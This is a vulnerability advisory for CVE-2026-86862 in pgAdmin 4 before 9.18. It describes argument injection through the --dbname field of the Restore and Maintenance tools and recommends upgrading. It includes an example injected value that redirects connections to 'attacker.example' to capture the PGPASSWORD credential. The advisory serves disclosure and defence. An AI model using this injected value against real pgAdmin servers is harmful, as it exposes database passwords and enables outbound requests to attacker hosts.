PT-2026-94389 · Pgadmin · Pgadmin

·

CVE-2026-86862

·

Published

2026-09-17

·

Updated

2026-09-17

CVSS v4.0

7.1

High

VectorAV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions pgAdmin 4 versions prior to 9.18
Description The Restore and Maintenance tools pass the client-supplied database field directly as the value of the --dbname option for pg restore and psql. Because libpq expands database names containing an equals sign into full connection strings, connection keywords in that value take precedence over the --host and --port arguments. An attacker can provide a value like host=attacker.example port=5432 dbname=x to redirect the utility to a server of their choice. Since pgAdmin exports the decrypted database password in the PGPASSWORD environment variable, the redirected connection may expose this credential to the attacker. Additionally, this allows outbound connections from the pgAdmin host to arbitrary network addresses. This issue is reachable by any authenticated user with tools restore or tools maintenance permissions, which are granted to the default User role.
Recommendations Update to version 9.18 or later.

Exploit

Fix

Argument Injection

Insufficiently Protected Credentials

SSRF

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

CVE-2026-86862

Affected Products

Pgadmin